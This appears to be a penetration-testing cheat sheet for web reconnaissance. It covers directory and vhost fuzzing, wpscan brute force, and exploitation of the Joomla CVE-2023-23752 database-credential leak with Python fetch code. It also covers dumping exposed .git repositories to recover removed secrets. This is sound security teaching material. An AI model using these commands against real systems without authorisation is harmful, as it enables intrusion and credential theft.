Port 80 (HTTP)

WhatWeb

whatweb http://IP

Directory Enumeration

gobuster dir -u <url> -w <wordlist.txt> -x <file_extensions>

-b blacklists response status codes (only 404 by default), e.g. to hide both 403 and 404 responses:

gobuster dir -u <url> -w <wordlist.txt> -x <file_extensions> -b 403,404

If the target is HTTPS with certificate issues (self-signed, expired, wrong name), add -k to skip TLS validation:

gobuster dir -u <url> -w <wordlist.txt> -x <file_extensions> -b 403,404 -k

wfuzz

wfuzz -c --hc 404 -t 200 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt https://example.com/FUZZ
  • --hs/--ss "regex" #Hide/Show by regex in response

  • --hc/--sc CODE #Hide/Show by response code

  • --hl/--sl NUM #Hide/Show by number of lines in response

  • --hw/--sw NUM #Hide/Show by number of words in response

  • --hh/--sh NUM #Hide/Show by number of chars in response

ffuf

ffuf takes single-dash flags; filters (-f*) hide responses and matchers (-m*) keep only the ones that match:

ffuf -c -t 200 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u https://example.com/FUZZ
  • -fr/-mr "regex" # Filter/Match by regex in response

  • -fc/-mc CODE # Filter/Match by response code

  • -fl/-ml NUM # Filter/Match by number of lines in response

  • -fw/-mw NUM # Filter/Match by number of words in response

  • -fs/-ms NUM # Filter/Match by number of chars (bytes) in response

  • -ac # Auto-calibrate the filters from responses to random paths
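
The filter flags above decide what the fuzzer hides, and on sites that answer 200 to every path the choice matters: byte size jitters (timestamps, nonces, CSRF tokens) while word and line counts usually do not, which is why ffuf -ac calibrates on random paths and filters on those. The following Python is an added example (it is not from the page, wfuzz or ffuf) that reproduces that calibration over constructed response data; every path and response tuple in it is made up.

```python
from collections import Counter

# Constructed sample: what a fuzzer sees on a site that answers 200 for unknown
# paths, as (status, words, lines, bytes). Not captured from a real target.
SAMPLE_RESPONSES = {
    "zq8v1kx2": (200, 311, 42, 4096),  # random probe -> the site's catch-all page
    "m3p9t0ha": (200, 311, 42, 4096),  # random probe
    "c7d2wq5e": (200, 311, 42, 4096),  # random probe
    "admin":    (200, 512, 77, 8810),  # genuinely different page
    "login":    (302, 0, 0, 0),        # redirect to the login form
    "backup":   (403, 23, 9, 287),     # forbidden, but it exists
    "index":    (200, 311, 42, 4103),  # catch-all page again, 7 bytes longer (timestamp)
    "old":      (404, 5, 1, 19),       # genuine 404
}
RANDOM_PROBES = ["zq8v1kx2", "m3p9t0ha", "c7d2wq5e"]


def calibrate(responses, probes):
    """Baseline = most common (status, words, lines) over the random probes,
    the idea behind ffuf -ac. Byte size is left out because it jitters."""
    sig = Counter((responses[p][0], responses[p][1], responses[p][2]) for p in probes)
    return sig.most_common(1)[0][0]


def filter_by_size(responses, probes, hide_codes=(404,)):
    """Naive exact-size filtering (-fs / --hh): the jittering copy of the
    catch-all page ("index") slips through as a false positive."""
    sizes = {responses[p][3] for p in probes}
    return sorted(p for p, (code, _w, _l, size) in responses.items()
                  if code not in hide_codes and size not in sizes)


def interesting(responses, baseline, hide_codes=(404,)):
    """Mirror the tools: a response is hidden when ANY filter matches (ffuf and
    wfuzz OR their -f*/--h* flags), here the baseline's words or lines."""
    _code, bw, bl = baseline
    return sorted(p for p, (code, words, lines, _size) in responses.items()
                  if code not in hide_codes and words != bw and lines != bl)


def as_flags(baseline):
    """Equivalent manual flags. Do not add the baseline status code (-fc/--hc):
    the filters are OR'ed, so that would hide every 200, admin included."""
    _code, words, lines = baseline
    return {"wfuzz": f"--hw {words} --hl {lines}", "ffuf": f"-fw {words} -fl {lines}"}


if __name__ == "__main__":
    base = calibrate(SAMPLE_RESPONSES, RANDOM_PROBES)
    print("baseline:", base, as_flags(base))
    print("by size :", filter_by_size(SAMPLE_RESPONSES, RANDOM_PROBES))
    print("by w/l  :", interesting(SAMPLE_RESPONSES, base))
```

Calibrate again whenever the target changes (a different vhost or directory often has a different catch-all page), and keep 403 out of the blacklist when directory listings or admin paths are the goal: a 403 still proves the path exists.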

DNS Subdomain Enumeration

gobuster dns -d <domain> -w <wordlist.txt> -i --wildcard

-i prints the resolved IPs; --wildcard forces gobuster to keep going when the zone resolves every name (then every entry "exists", so compare the IPs instead). Names without a public DNS record can still be reached as virtual hosts by fuzzing the Host header:

wfuzz -c --hc 400,404 -t 20 -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-20000.txt -H "Host: FUZZ.example.com" -u http://example.com

VHost Enumeration

gobuster vhost -u http://<RHOST> -t 50 -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt
gobuster vhost -u http://<RHOST> -t 50 -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain

Since gobuster 3.2 the Host header is just the wordlist entry unless --append-domain is given, which sends <word>.<domain> instead, so pass the domain in -u (e.g. http://example.com) when appending. Real vhosts stand out by a different response size/status than a request with a random Host.

Fuzzing a Request

Save the raw request (e.g. copied from Burp) to ssrf.req with the FUZZ keyword where the payload goes; -request-proto supplies the scheme, which a raw request does not carry. Here the wordlist is the whole port range, to find internal services through an SSRF; filter the baseline response with -fs/-fw as in the directory case:

ffuf -request ssrf.req -request-proto http -w <(seq 1 65535) -debug-log /dev/stdout

CMS

WordPress

Automatic

wpscan --url http://example.com --api-token "token"
wpscan --url https://<RHOST> --enumerate u,t,p
wpscan --url https://<RHOST> --plugins-detection aggressive
wpscan --url https://<RHOST> --disable-tls-checks
wpscan --url https://<RHOST> --disable-tls-checks --enumerate u,t,p

--api-token adds known-vulnerability lookups from the WPScan API; --enumerate u,t,p enumerates users, themes and plugins (plugin detection is passive by default, aggressive requests every known plugin path); --disable-tls-checks is the equivalent of gobuster's -k.

User Enumeration

wpscan --url https://example.com --enumerate u

Brute Force

wpscan --url example.com -U user -P /usr/share/wordlists/rockyou.txt
wpscan --url http://<RHOST> -U <USERNAME> -P passwords.txt -t 50

Manual

To identify the version manually there are several places to look:

  • View the page source and check the <meta name="generator" content="WordPress x.y.z"> tag.

  • Read /readme.html or /license.txt if they were not removed.

  • Check the HTTP response headers, and the ?ver= parameter on the CSS/JS assets loaded from /wp-includes/ (core assets carry the core version, plugin assets carry the plugin's).

  • Look at /wp-login.php and /wp-admin/ (the login page loads versioned assets too).

  • Query the REST API at /wp-json/wp/v2/users (user enumeration, see below).

User Enumeration

curl https://xxx/wp-json/wp/v2/users

WordPress wordlists

  • /usr/share/wordlists/SecLists/Discovery/Web-Content/CMS/wordpress.fuzz.txt

  • /usr/share/wordlists/SecLists/Discovery/Web-Content/CMS/wp-themes.fuzz.txt

Important Files and Directories

Login or authentication

  • /wp-login.php (sometimes renamed, e.g. to login.php).

  • /wp-admin/login.php

  • /wp-admin/wp-login.php

  • /xmlrpc.php (if enabled, system.multicall lets a single request try many passwords, so check it before brute forcing wp-login.php)

Directories

  • /wp-content (where plugins and themes are stored).

  • /wp-content/uploads/ (where the uploaded files are stored)

  • wp-config.php (contains the database credentials; not readable through the web server normally, but look for backups such as wp-config.php.bak or wp-config.php~)
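
The manual checks above, as an added example (it is not from the page or from WPScan): Python that extracts the version from the generator tag, the ?ver= of core assets or readme.html, and reads the author list from /wp-json/wp/v2/users. The HTML and JSON samples are constructed; fingerprint() runs the same checks against a live site and assumes the target is reachable.

```python
import json
import re
import urllib.request

# Constructed samples standing in for the live responses (not from a real site).
SAMPLE_INDEX_HTML = """<!DOCTYPE html><html><head>
<meta name="generator" content="WordPress 6.2.2" />
<script src="/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.7.7"></script>
<link rel="stylesheet" href="/wp-includes/css/dist/block-library/style.min.css?ver=6.2.2" />
</head><body></body></html>"""

SAMPLE_README_HTML = """<h1 id="logo"><img alt="WordPress" src="wp-admin/images/wordpress-logo.png" />
<br /> Version 6.2.2
</h1>"""

WP_USERS_JSON = """[{"id":1,"name":"Site Admin","slug":"admin","link":"https://example.com/author/admin/"},
{"id":3,"name":"Jane Editor","slug":"jeditor","link":"https://example.com/author/jeditor/"}]"""

META_RE = re.compile(r'<meta\s+name="generator"\s+content="WordPress\s+([\d.]+)"', re.I)
CORE_ASSET_RE = re.compile(r'/wp-includes/[^"\']+\?ver=([\d.]+)', re.I)
README_RE = re.compile(r'Version\s+([\d.]+)', re.I)


def version_from_html(html):
    """Generator tag first; fall back to ?ver= on core assets. Only /wp-includes/
    assets are trusted because plugin assets carry the plugin's own version."""
    m = META_RE.search(html) or CORE_ASSET_RE.search(html)
    return m.group(1) if m else None


def version_from_readme(text):
    m = README_RE.search(text)
    return m.group(1) if m else None


def users_from_json(text):
    """/wp-json/wp/v2/users lists public author profiles; slug is normally the login name."""
    return [(u["id"], u["slug"], u.get("name", "")) for u in json.loads(text)]


def fetch(url, timeout=10):
    req = urllib.request.Request(url, headers={"User-Agent": "Mozilla/5.0"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:  # assumes a reachable target
        return resp.read().decode("utf-8", "replace")


def fingerprint(base_url):
    """Live version of the checks above; base_url is the site root (hypothetical target)."""
    base_url = base_url.rstrip("/")
    result = {"version": None, "users": []}
    for getter, path in ((version_from_html, "/"), (version_from_readme, "/readme.html")):
        try:
            result["version"] = getter(fetch(base_url + path))
        except Exception:
            continue
        if result["version"]:
            break
    try:
        result["users"] = users_from_json(fetch(base_url + "/wp-json/wp/v2/users"))
    except Exception:
        pass  # REST API disabled or users endpoint blocked
    return result


if __name__ == "__main__":
    print(version_from_html(SAMPLE_INDEX_HTML), version_from_readme(SAMPLE_README_HTML))
    print(users_from_json(WP_USERS_JSON))
```

The slugs are what go into the wpscan -U list; a site that returns 401 on the users endpoint has blocked it, which is itself worth noting, since the author archive (/?author=1) often still redirects to the slug.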

Joomla

Automatic

droopescan scan joomla --url http://joomla-site.local/

Manual

The version is usually readable in /administrator/manifests/files/joomla.xml. Joomla 4.0.0 through 4.2.7 is vulnerable to an unauthenticated information disclosure (CVE-2023-23752): an improper access check lets anyone read web service endpoints by appending ?public=true, which dumps the database credentials and the user list (either URL form works, /api/v1/ needs URL rewriting, /api/index.php/v1/ does not):

  • Users: http://<host>/api/v1/users?public=true

  • Config (DB host, user, password, prefix): http://<host>/api/index.php/v1/config/application?public=true
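
Added example (it is not from the page, Joomla or droopescan) for parsing what the two endpoints above return. The samples mimic the JSON:API shape of the Joomla web services (each data item carries an attributes object) but are constructed, and the parser merges all attribute objects so it does not depend on how the values are split across items. fetch_db_credentials() performs the live request for the config endpoint and assumes the host is reachable.

```python
import json
import urllib.request

# Constructed sample of the config endpoint's response. In the real API each
# data item tends to carry a single attribute, which is why they are merged below.
JOOMLA_CONFIG_JSON = """{
 "links": {"self": "http://example.com/api/index.php/v1/config/application"},
 "data": [
  {"type": "application", "id": 224, "attributes": {"offline": false, "id": 224}},
  {"type": "application", "id": 224, "attributes": {"sitename": "Example Site", "id": 224}},
  {"type": "application", "id": 224, "attributes": {"dbtype": "mysqli", "id": 224}},
  {"type": "application", "id": 224, "attributes": {"host": "localhost", "id": 224}},
  {"type": "application", "id": 224, "attributes": {"user": "joomla_db", "id": 224}},
  {"type": "application", "id": 224, "attributes": {"password": "J00mlaDbP4ss!", "id": 224}},
  {"type": "application", "id": 224, "attributes": {"db": "joomla", "id": 224}},
  {"type": "application", "id": 224, "attributes": {"dbprefix": "xyz_", "id": 224}}
 ]
}"""

# Constructed sample of the users endpoint's response.
JOOMLA_USERS_JSON = """{
 "data": [
  {"type": "users", "id": 42, "attributes": {"id": 42, "name": "Super User", "username": "admin",
   "email": "admin@example.com", "group_names": "Super Users", "block": 0}},
  {"type": "users", "id": 43, "attributes": {"id": 43, "name": "Editor", "username": "editor",
   "email": "editor@example.com", "group_names": "Editor", "block": 0}}
 ]
}"""

DB_KEYS = ("dbtype", "host", "user", "password", "db", "dbprefix")


def merge_attributes(payload):
    """Flatten every data item's attributes into one dict (later items win)."""
    merged = {}
    for item in payload.get("data", []):
        merged.update(item.get("attributes", {}))
    return merged


def db_credentials(text):
    """Return only the database-related keys from a config/application response."""
    attrs = merge_attributes(json.loads(text))
    return {k: attrs.get(k) for k in DB_KEYS}


def list_users(text):
    """(username, email, group_names) per account from a users response."""
    return [(a.get("username"), a.get("email"), a.get("group_names"))
            for a in (item.get("attributes", {}) for item in json.loads(text).get("data", []))]


def fetch_db_credentials(host, timeout=10):
    """Live request (hypothetical host). Returns None when the endpoint is not exposed."""
    url = f"http://{host}/api/index.php/v1/config/application?public=true"
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return db_credentials(resp.read().decode("utf-8", "replace"))
    except Exception:
        return None


if __name__ == "__main__":
    print(db_credentials(JOOMLA_CONFIG_JSON))
    print(list_users(JOOMLA_USERS_JSON))
```

The recovered user/password pair is for the database, not the Joomla login, so the next step is a reachable MySQL port (or password reuse against SSH and the administrator panel); the usernames from the second endpoint are the list for that.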

Drupal

droopescan scan drupal --url https://example.com

GitTools

gitdumper.sh downloads an exposed .git directory without needing a directory listing (it starts from HEAD and the refs and follows the object hashes), and extractor.sh rebuilds every commit into its own numbered folder with its metadata next to it, so files deleted later in the history can be read directly:

./gitdumper.sh http://<RHOST>/.git/ /PATH/TO/FOLDER
./extractor.sh /PATH/TO/FOLDER/ /PATH/TO/FOLDER/

Enumeration of .git repository

Walk the history once it is dumped: commit messages such as "remove credentials" point straight at the interesting commit, and git show prints its full diff, including the lines that were removed.

git log
git show <hash>
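
Added example (it is not from the page or GitTools) of the same history walk without the git binary: it resolves HEAD, inflates the loose objects a dump contains, follows first parents and greps every blob of every commit for credential-looking assignments, which surfaces values that a later commit removed. demo() builds a constructed two-commit repository in a temporary directory to run it against. Packfiles are not handled; a dump that only has packs needs git itself or extractor.sh.

```python
import hashlib
import os
import re
import tempfile
import zlib

# key = 'value' / key: "value" style assignments; tune the key list for the target.
SECRET_RE = re.compile(rb"(password|passwd|secret|api[_-]?key|token)\s*[=:]\s*['\"]([^'\"]+)['\"]", re.I)


def read_object(gitdir, sha):
    """Inflate a loose object and split the 'type size\\0' header from the body."""
    with open(os.path.join(gitdir, "objects", sha[:2], sha[2:]), "rb") as f:
        header, _, body = zlib.decompress(f.read()).partition(b"\x00")
    return header.split(b" ")[0].decode(), body


def parse_commit(body):
    head, _, message = body.partition(b"\n\n")
    fields = {}
    for line in head.split(b"\n"):
        key, _, value = line.partition(b" ")
        fields.setdefault(key.decode(), []).append(value.decode())
    return fields, message.decode().strip()


def walk_tree(gitdir, tree_sha, prefix=""):
    """Yield (path, blob_sha) for every file reachable from a tree object."""
    body, i = read_object(gitdir, tree_sha)[1], 0
    while i < len(body):
        j = body.index(b"\x00", i)
        mode, name = body[i:j].split(b" ", 1)
        sha, i = body[j + 1:j + 21].hex(), j + 21   # 20 raw SHA-1 bytes follow the NUL
        if mode == b"40000":                        # subdirectory
            yield from walk_tree(gitdir, sha, prefix + name.decode() + "/")
        else:
            yield prefix + name.decode(), sha


def head_commit(gitdir):
    with open(os.path.join(gitdir, "HEAD")) as f:
        ref = f.read().strip()
    if not ref.startswith("ref: "):
        return ref                                  # detached HEAD holds the hash itself
    with open(os.path.join(gitdir, ref[5:])) as f:
        return f.read().strip()


def find_secrets(gitdir):
    """Follow first parents from HEAD and grep every blob of every commit."""
    findings, sha = [], head_commit(gitdir)
    while sha:
        fields, message = parse_commit(read_object(gitdir, sha)[1])
        for path, blob in walk_tree(gitdir, fields["tree"][0]):
            for m in SECRET_RE.finditer(read_object(gitdir, blob)[1]):
                findings.append((sha[:7], message, path, m.group(2).decode()))
        sha = fields.get("parent", [None])[0]
    return findings


# --- constructed demo repository, written the way git stores loose objects ----
def write_object(gitdir, otype, data):
    raw = b"%s %d\x00" % (otype.encode(), len(data)) + data
    sha = hashlib.sha1(raw).hexdigest()
    os.makedirs(os.path.join(gitdir, "objects", sha[:2]), exist_ok=True)
    with open(os.path.join(gitdir, "objects", sha[:2], sha[2:]), "wb") as f:
        f.write(zlib.compress(raw))
    return sha


def commit(gitdir, files, message, parent=None):
    entries = b"".join(b"100644 " + n.encode() + b"\x00" + bytes.fromhex(write_object(gitdir, "blob", c))
                       for n, c in sorted(files.items()))
    body = b"tree " + write_object(gitdir, "tree", entries).encode() + b"\n"
    body += (b"parent " + parent.encode() + b"\n") if parent else b""
    body += b"author dev <dev@example.com> 0 +0000\ncommitter dev <dev@example.com> 0 +0000\n\n" + message.encode() + b"\n"
    return write_object(gitdir, "commit", body)


def demo():
    """Two commits: a hardcoded DB password, then its removal. HEAD shows nothing, history does."""
    gitdir = os.path.join(tempfile.mkdtemp(), ".git")
    os.makedirs(os.path.join(gitdir, "refs", "heads"))
    c1 = commit(gitdir, {"config.php": b"<?php $db_password = 'Sup3rS3cret!';\n"}, "initial commit")
    c2 = commit(gitdir, {"config.php": b"<?php $db_password = getenv('DB_PASS');\n"}, "move password to env", c1)
    with open(os.path.join(gitdir, "HEAD"), "w") as f:
        f.write("ref: refs/heads/master\n")
    with open(os.path.join(gitdir, "refs", "heads", "master"), "w") as f:
        f.write(c2 + "\n")
    return find_secrets(gitdir)


if __name__ == "__main__":
    for commit_id, message, path, value in demo():
        print(f"{commit_id} {path}: {value!r}  ({message})")
```

Point find_secrets() at the dumped .git folder to run it on a real dump; only the first-parent chain from HEAD is followed, so also iterate refs/heads/* and packed-refs for branches that were never merged, which is where abandoned credentials usually live.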